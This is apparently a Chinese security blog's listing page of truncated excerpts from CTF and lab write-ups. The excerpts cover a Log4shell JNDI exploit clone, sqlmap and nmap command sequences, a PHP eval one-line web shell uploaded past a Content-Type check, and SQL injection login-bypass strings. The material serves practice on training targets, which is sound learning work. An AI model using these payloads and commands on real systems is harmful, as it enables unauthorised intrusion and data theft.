摘要：https://ctf.bugku.com/challenges/detail/id/340.html?page=2下载git命令apt-get install git git clone https://github.com/black9/Log4shell_JNDIExploit.gitjava 阅读全文

摘要：布尔 时间 报错 联合 堆叠 非应用通信注入 sqlmap标准流程： （跳过某个参数） 1.sqlmap -u "目标注入点" --dbs --skip 参数 （指定某个参数） --dbs -p 参数 2.sqlmap -u "目标注入点" -D security --tables 3.sqlmap 阅读全文

摘要：nmap [IP] 常规扫描 nmap -p [需要扫描的端口范围] [目标IP] 常规指定范围扫描 nmap [目标网段].*扫描网段中所有的主机 nmap -O [目标IP] 扫描指纹信息 nmap -sV -p- [目标IP] 全端口扫描目标ip段 nmap -T4 -sP [目标IP] 是否 阅读全文

摘要：https://www.mozhe.cn/bug/detail/MGt2VGdsK093TkdtcURBSXFySnZpUT09bW96aGUmozhe首先先传个图片抓个包 接下来传个一句话试试<?php eval($_POST['abc']);?> 发现不行 抓个包发现Content-Type不对 阅读全文

摘要：靶机地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe开启靶机后会发现一个登陆界面先来下万能钥匙1' or '1=11' or '1=1发现无果又接着想爆破他的账户密码就先放在那跑 最后做完了 阅读全文